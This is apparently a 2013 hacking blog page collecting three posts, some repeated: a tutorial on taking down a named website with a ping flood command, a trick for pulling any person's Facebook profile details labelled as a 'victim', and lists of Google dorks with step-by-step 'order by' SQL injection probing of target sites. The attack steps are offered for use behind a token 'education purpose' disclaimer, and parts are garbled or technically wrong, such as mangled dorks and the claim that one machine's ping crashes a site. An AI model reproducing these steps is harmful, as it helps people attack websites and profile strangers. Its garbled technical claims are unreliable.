Introductory Video

Wednesday, 17 July 2013

, , , ,

What Is DDOS Attack ? How To DDoS Any Website Manually | Shut Down Him

DDOS Attack


 

Hi Guys.In my previous post I tell you How to Hack any website.Today i tell you how to DDoS Any Website.First i tell you what is DDOS Attack ?DDOS, short for Distributed Denial of Service, is a type of DOS attack where multiple compromised systems -- which are usually infected with a Trojan -- are used to target a single system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of both the end targeted system and all systems maliciously used and controlled by the hacker in the distributed attack.

Now DDos Any Website :)

How To DDOS Any Website

1.Find  a target website Which you want to DDOS
  EG:
 www.4chan.org.com

2. Now we have to find ip adress of website in my previous post i tell you how to find ip address of any website so, Goto run )Typ CMD )then  type ping your target website url 
EG:  www.4chan.org

 

3. Now you will find the ip adress of website below just copy that ip adress let it for ex : 204.152.204.166

4. Now we have got ip adress to send the packets , now in the next line  type :

      ping
204.152.204.166  -t -l 65500     [Here ip adress is just an example]

 


Now keep your computer as it is for 1 hour

5.After one hour visit the website you will see the website is crashed :D...!!

6. This method is more effective if u send the packets from  different computers at same time on the same website :)


Note:
Only use for education purpose

Enjoy Comment Must :) 

, , , ,

What Is DDOS Attack ? How To DDoS Any Website Manually | Shut Down Him

DDOS Attack


 

Hi Guys.In my previous post I tell you How to Hack any website.Today i tell you how to DDoS Any Website.First i tell you what is DDOS Attack ?DDOS, short for Distributed Denial of Service, is a type of DOS attack where multiple compromised systems -- which are usually infected with a Trojan -- are used to target a single system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of both the end targeted system and all systems maliciously used and controlled by the hacker in the distributed attack.

Now DDos Any Website :)

Tuesday, 16 July 2013

, ,

Get Any Facebook Profile Details With The Help Of User Name ?

Facebook Profile Details



Hi Guys.Today I tell you how to get any Facebook profile id number name first name last name link user name his gender location  on Facebook.This is Very Simple and intrusting trick which will let you get profile id of any person who got custom username.With the help of user name you can find any Facebook id just in one click.to know this trick you just follow my steps
Lets Start :
1. Go to victim profile id which you want to see details
Eg you want to find my profile id details my
www.Facebook.com/hasaanjutthaxor

2. My Facebook url look like this www.Facebook.com/hasaanjutthaxor

3. Change that URL to graph.Facebook.com/hasaanjutthaxor

4. Then you will get his Facebook id number name first name last name link user name his gender location like shown below.

Note :
you can send me Friend Request On Facebook 
only for study purpose :
 
Enjoy :)
, ,

Get Any Facebook Profile Details With The Help Of User Name ?

Facebook Profile Details



Hi Guys.Today I tell you how to get any Facebook profile id number name first name last name link user name his gender location  on Facebook.This is Very Simple and intrusting trick which will let you get profile id of any person who got custom username.With the help of user name you can find any Facebook id just in one click.to know this trick you just follow my steps
Lets Start :

Monday, 15 July 2013

, , , ,

How To Find A Vulnerable Website For XSS, SQLI, LFI, RFI Using Google Dorks ?

Find A Vulnerable Website Using Google Dorks


Hi Guys.In My previous Post i give you some Google Dorks list.Now Today I tell You How To Find A Vulnerable Website Using Google Dorks.Most of the people search in Google or other search engine to check the vulnerable website and in the end some are successful and some are not. This is also problem for new Hackers who don’t know how to check the vulnerable website.Google is best friend for Hackers.Now We can find the Vulnerable website using Google search. This is known as Google Dorks.
There are lot of dorks to check the website is it vulnerable or not.There are lot of dorks to check the website is it vulnerable or not.
Now Lets Start :


Check website for SQL injection SQLI:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=


For More Click Here

copy one from above list and paste in Google search box,And hit enter like shown below
Eg:

http://www.Google.com/index.php?id=2

Now hit enter:
 

if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.


Now let's check further:Remove single quote from url
Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).

For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)

Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable
.

If the above method is not working,then try this:
 

http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)

If this is also not working,then try this:

http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)

Check website for Cross site scripting XSS:

inurl:".php?search="

inurl:".php?searchstring="


inurl:search.php?q=


inurl:com_feedpostold/feedpost.php?url=


inurl:/poll/default.asp?catid=

 

inurl:/search_results.php?search=
 
inurl:scrapbook.php?id=
 

inurl:headersearch.php?sid=

How to check Sub domain :

If you want to find vulnerabilities of website . so you should go for sub domain. The best dork for searching subdomain is below 
Site: URL –inurl:www
Like if I want to find the subdomain of Google . so it’s like below and don’t add Http and www with the domain 
Site: google.com –inurl:www
 
 
 Enjoy :)